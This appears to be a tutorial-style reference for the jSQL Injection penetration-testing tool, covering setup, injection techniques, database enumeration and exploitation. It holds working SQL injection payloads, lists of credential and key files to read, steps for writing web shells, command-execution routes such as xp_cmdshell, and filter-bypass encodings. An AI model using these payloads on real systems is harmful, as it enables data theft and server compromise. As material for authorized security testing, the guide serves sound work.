jSQL Injection

Overview

jSQL Injection is an open-source automated SQL injection testing tool featuring a user-friendly graphical interface. It enables security professionals to detect and exploit SQL injection vulnerabilities in web applications during authorized penetration testing and vulnerability assessment.

The tool supports multiple database systems, injection techniques, and provides automated database enumeration, data extraction, and exploitation capabilities for comprehensive SQL injection testing.

Installation

Prerequisites

• Java Runtime Environment (JRE) 8 or higher
• 2GB RAM minimum
• Network access to target
• GUI environment (X11 on Linux)

Installation Steps

# Download latest release
wget https://github.com/ron190/jsql-injection/releases/download/v0.84/jsql-injection-v0.84.jar

# Verify Java installation
java -version

# Run application
java -jar jsql-injection-v0.84.jar

Linux Installation

# Install Java
sudo apt-get update
sudo apt-get install openjdk-11-jre-headless

# Download jSQL
git clone https://github.com/ron190/jsql-injection.git
cd jsql-injection

# Build from source
mvn clean install

# Run
java -jar target/jsql-injection-*-all.jar

macOS Installation

# Install Java via Homebrew
brew install openjdk@11
export PATH="/usr/local/opt/openjdk@11/bin:$PATH"

# Download and run
wget https://github.com/ron190/jsql-injection/releases/download/v0.84/jsql-injection-v0.84.jar
java -jar jsql-injection-v0.84.jar

Docker Deployment

# Build Docker image
docker build -t jsql-injection .

# Run with display
docker run -it -e DISPLAY=$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  jsql-injection

# Headless with API mode
docker run -d -p 8080:8080 jsql-injection --api

GUI Fundamentals

Main Interface Components

Component	Purpose
URL Bar	Target URL input field
Injection Panel	Configure injection parameters
Method Selector	GET/POST/HTTP method
Database Type	MySQL, PostgreSQL, Oracle, SQL Server
Payload Panel	View generated payloads
Results Pane	Display retrieved data
Console Tab	Technical details and logs

Starting jSQL

# Launch GUI
java -jar jsql-injection-v0.84.jar

# GUI loads with:
# - Target URL input field
# - HTTP method selector (GET/POST)
# - Database selection dropdown
# - Injection technique options
# - Results display panels

Target Configuration

Setting Up Target URL

# Enter URL in target field
# Examples:
http://target.com/page.php?id=1
https://site.com/search.php?q=user

# jSQL works with:
# - GET parameters: ?id=1
# - POST form data
# - HTTP headers (User-Agent, Cookie, etc.)
# - AJAX requests

# URL variations
http://target.com/page.php?id=1                    # Basic parameter
http://target.com/page.php?id=1'                   # Test parameter
http://target.com/page.php?id=1' AND '1'='1       # Manual test
http://target.com/page.php?id=1) AND ('1'='1      # Parenthesis context

HTTP Method Configuration

# Select method through GUI dropdown

# GET Request
# - Parameters in URL query string
# - jSQL appends payloads to URL

# POST Request
# - Parameters in request body
# - Configure in POST data field
# - Form parameters sent in body

# Custom Headers
# - User-Agent injection
# - Cookie injection
# - Custom header values
# - Referer manipulation

Request Configuration

# Configure POST data
username=admin&password=test

# Add multiple parameters
id=1&name=test&email=user@site.com

# Cookie-based injection
# Insert into Cookie field in jSQL
sessionid=abc123def456

# Header injection
# X-Custom-Header: value'

# User-Agent injection
# Mozilla/5.0' OR '1'='1

Database Detection and Configuration

Automatic Database Detection

# jSQL attempts detection through:
# 1. Error messages (MySQL, PostgreSQL, Oracle)
# 2. Timing-based responses
# 3. Payload-specific reactions
# 4. DBMS fingerprinting

# Supported databases:
# - MySQL
# - PostgreSQL
# - Oracle
# - Microsoft SQL Server
# - SQLite
# - H2
# - Sybase
# - IBM DB2

Manual Database Selection

# Through GUI:
# Database dropdown menu selection

# Testing each database:
# 1. Enter URL
# 2. Select database type from dropdown
# 3. Configure parameters
# 4. Run detection/exploitation
# 5. jSQL tests with appropriate payloads

Injection Techniques

Boolean-Based Blind Injection

# jSQL configuration:
# - Select "Boolean" detection method
# - Configure TRUE/FALSE responses
# - Set comparison logic

# Method flow:
# 1. jSQL injects conditions: AND 1=1 (true), AND 1=2 (false)
# 2. Compares response differences
# 3. Extracts data bit-by-bit
# 4. Slower but stealthy

# Example payloads:
id=1' AND '1'='1          # True response
id=1' AND '1'='2          # False response
id=1' AND SUBSTRING(database(),1,1)='m'  # Extract data

Time-Based Blind Injection

# jSQL configuration:
# - Select "Time" detection method
# - Set time threshold (default: 5 seconds)
# - Configure delay mechanism

# Method flow:
# 1. Inject delays: SLEEP(5), BENCHMARK(1000000, MD5('a'))
# 2. Measure response time
# 3. Infer true/false from timing
# 4. Extract data through delays

# Example payloads:
id=1' AND SLEEP(5) AND '1'='1    # True = 5+ sec delay
id=1' AND SLEEP(0) AND '1'='1    # False = no delay
id=1' AND IF(1=1, SLEEP(5), 0)  # Conditional delay

Error-Based Injection

# jSQL configuration:
# - Select "Error" technique
# - Enable error message display
# - Configure response parsing

# Method flow:
# 1. Craft payloads triggering errors
# 2. Parse database error messages
# 3. Extract data from error content
# 4. Fastest method but noisier

# Example payloads:
id=1' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -
id=1' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -
id=1' UNION ALL SELECT NULL,database()-- -

UNION-Based Injection

# jSQL configuration:
# - Determine column count
# - Identify column data types
# - Build UNION queries

# Automatic column detection:
# 1. Try incremental UNION SELECT statements
# 2. Identify number of columns
# 3. Test each column for data extraction
# 4. Build final exploitation query

# Example payloads:
id=1' UNION SELECT NULL,NULL,NULL-- -
id=1' UNION SELECT database(),user(),version()-- -
id=1' UNION SELECT GROUP_CONCAT(table_name),2,3 FROM information_schema.tables WHERE table_schema=database()-- -

Database Enumeration

Discovering Database Structure

# Through jSQL GUI:
# 1. Tabs appear after successful detection
# - Database tab
# - Tables tab
# - Columns tab
# - Data tab

# Automatic enumeration:
# - Select target database from dropdown
# - jSQL retrieves table list
# - Expand tables to see columns
# - Extract data on demand

# Key information retrieved:
# - Database names
# - Table names
# - Column names and types
# - Data contents
# - User information

Table Enumeration

# Via jSQL interface:
# 1. Click "Database" tab
# 2. Select database from list
# 3. jSQL auto-loads tables
# 4. Click table to expand columns
# 5. View column names and inferred types

# Alternative manual enumeration:
# Query: SELECT table_name FROM information_schema.tables
# WHERE table_schema=database()

# Common tables to check:
# - users / accounts / admin
# - products / items / content
# - orders / transactions
# - logs / activity
# - configuration / settings

Data Extraction

# jSQL workflow:
# 1. Navigate to target table
# 2. Click "Dump" or "Extract" button
# 3. jSQL retrieves all records
# 4. Display in results panel
# 5. Export to file if needed

# Size limitations:
# - Adjust chunk size for large tables
# - jSQL handles pagination
# - Progress shown during extraction
# - Partial results available immediately

Exploitation Techniques

File Reading

# MySQL file reading:
# SELECT LOAD_FILE('/etc/passwd')
# SELECT LOAD_FILE('C:\\windows\\win.ini')

# jSQL exploitation:
# 1. Select "File" option if available
# 2. Enter file path
# 3. jSQL constructs payload
# 4. Retrieve file contents

# Common target files:
# Linux:
# /etc/passwd
# /etc/shadow
# /root/.ssh/id_rsa
# /var/www/html/config.php
# /home/user/.bash_history

# Windows:
# C:\\windows\\win.ini
# C:\\windows\\system32\\config\\SAM
# C:\\inetpub\\wwwroot\\web.config

File Writing

# MySQL file writing (if privileges allow):
# SELECT ... INTO OUTFILE '/path/to/file'

# jSQL method:
# 1. Select "File Write" option
# 2. Enter target path
# 3. Provide payload content
# 4. jSQL writes to file

# Exploitation scenarios:
# - Write web shell to web directory
# - Create .php backdoor
# - Modify configuration files
# - Insert malicious code

Command Execution

# Database system command execution:

# MySQL (if UDF available):
# sys_exec()

# MSSQL:
# xp_cmdshell

# PostgreSQL:
# copy (SELECT '') to program 'command'

# jSQL checks and attempts:
# 1. Detect DB system
# 2. Check for execution functions
# 3. Construct payload
# 4. Execute and retrieve output

Advanced Features

Payload Generation

# jSQL generates payloads for:
# - Current injection technique
# - Selected database type
# - Configured encoding
# - Bypass filters if applicable

# View generated payload:
# Check "Console" tab in jSQL
# Shows raw SQL being executed
# Useful for understanding injection

# Custom payloads:
# If automatic fails, craft manual payloads
# Copy from console
# Modify and retest
# jSQL provides template

Filter Bypass

# jSQL includes bypass techniques for:

# Comment removal filters
# - Use alternative comment syntax
# - MySQL: /*! code */
# - Nested comments

# Keyword filters
# - Case variation: SELECT, select, sELeCt
# - URL encoding: %53%45%4c%45%43%54
# - Unicode encoding
# - Hex encoding

# Whitespace filters
# - Tab characters: \t
# - Newline characters: \n
# - Parenthesis: UNION()SELECT

# Encoding options in jSQL:
# - URL encoding
# - Hex encoding
# - Double URL encoding
# - Unicode encoding

Proxy and Network Configuration

# Configure through Settings/Preferences:

# Proxy settings:
# - HTTP proxy address
# - Proxy port
# - Authentication credentials
# - SOCKS proxy support

# SSL/TLS options:
# - Certificate verification
# - Self-signed certificate handling
# - Client certificate configuration

# Connection settings:
# - Timeout duration
# - Retry attempts
# - Connection pool size
# - User agent configuration

Data Export and Reporting

Export Retrieved Data

# jSQL export options:
# - CSV format
# - JSON format
# - XML format
# - SQL INSERT statements
# - Text file

# Export from GUI:
# 1. Select data in results pane
# 2. Right-click → Export
# 3. Choose format
# 4. Select location
# 5. jSQL saves file

# Command-line export (if available):
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --database=mysql \
  --export=csv \
  --output-file=results.csv

Generate Reports

# Documentation of findings:

# Information to document:
# - Target URL
# - Injection point (parameter name)
# - Injection technique used
# - DBMS identified
# - Databases accessible
# - Tables and columns retrieved
# - Sample extracted data
# - Severity assessment

# Sample report content:
cat > SQL_Injection_Report.txt << EOF
Target: http://target.com
Parameter: id
Technique: Error-based Union
DBMS: MySQL 5.7.14
Databases: information_schema, mysql, test, application

Tables in 'application':
- users (id, username, password, email)
- products (id, name, price, stock)
- orders (id, user_id, product_id, amount)

Sample data retrieved:
- User count: 152
- Admin users: 3
- Default configuration: Yes
EOF

Command Line Interface

Headless Mode Operation

# Run without GUI:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --technique=error \
  --database=mysql

# Output results to file:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --output=/path/to/results.txt

# Batch testing:
java -jar jsql-injection.jar \
  --list-of-urls=targets.txt \
  --batch-mode

Best Practices

Authorized Testing

• Obtain written authorization before testing
• Define clear scope and boundaries
• Test on dedicated test systems when possible
• Notify infrastructure teams in advance
• Document all activities and findings
• Follow responsible disclosure procedures
• Maintain confidentiality of data accessed

Testing Methodology

# 1. Reconnaissance Phase
# - Identify vulnerable parameters
# - Test basic SQLi syntax
# - Determine database type
# - Assess difficulty level

# 2. Exploitation Phase
# - Select optimal technique
# - Extract database structure
# - Retrieve sensitive data
# - Assess data sensitivity

# 3. Analysis Phase
# - Document vulnerabilities
# - Determine severity
# - Identify root cause
# - Recommend fixes

# 4. Reporting Phase
# - Detail findings
# - Provide proof of concept
# - Suggest remediation
# - Support remediation efforts

Safe Testing Guidelines

# Prevention measures:
# - Test on staging systems
# - Create snapshots before testing
# - Limit scope to assigned areas
# - Avoid data modification (read-only testing)
# - Document baseline before testing
# - Monitor for unexpected behavior

# Testing workflow:
# 1. Start with information gathering
# 2. Minimal impact testing first
# 3. Progress to exploitation
# 4. Stop testing once confirmed
# 5. Clean up and document

Troubleshooting

Common Issues

Issue	Solution
Target not responding	Check connectivity, verify URL, adjust timeout
No SQLi detected	Target may be patched, try other parameters
Database type wrong	Verify through error messages, test manually
Data extraction slow	Adjust technique, increase timeout, reduce data size
WAF blocking requests	Use proxy, change encoding, adjust timing

Debug and Logging

# Enable verbose output:
java -jar jsql-injection.jar \
  --url="http://target.com/?id=1" \
  --verbose

# Check console tab in GUI for:
# - Generated payloads
# - Server responses
# - Detection details
# - Error messages

# Common error messages:
# "No DBMS detected" - SQLi not present or filtered
# "Connection timeout" - Network or firewall issue
# "403 Forbidden" - WAF blocking requests

See Also

• SQLMap automated SQL injection tool
• OWASP SQL Injection prevention guide
• SQL injection attack methodologies
• Web application security testing frameworks
• Database security hardening
• Prepared statements and parameterized queries